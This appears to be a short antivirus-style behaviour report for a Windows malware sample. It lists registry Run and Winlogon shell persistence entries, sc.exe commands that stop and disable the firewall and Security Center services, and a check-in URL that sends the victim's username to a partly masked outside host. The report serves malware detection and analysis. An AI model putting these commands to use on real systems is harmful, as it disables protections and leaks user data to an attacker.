Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'smss' = 'c:\winlogon.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'shell' = 'Explorer.exe "c:\winlogon.exe"'
- <SYSTEM32>\sc.exe stop sharedAccess sc config sharedAccess start=disabled
- <SYSTEM32>\sc.exe stop wscsvc sc config wscsvc start=disabled
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://ch####.shinranet.com/A2Corp/update.php?da########################### 12:50:16 PM:::...<br>Instalacion Completa<br></b>&user=%USERNAME%
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\update[1].php
- 'ch####.shinranet.com':80
- 'localhost':1036
- ch####.shinranet.com/A2Corp/update.php?da#################################################################################################
- DNS ASK ch####.shinranet.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: 'Inside - Microsoft Internet Explorer'
- ClassName: '' WindowName: ''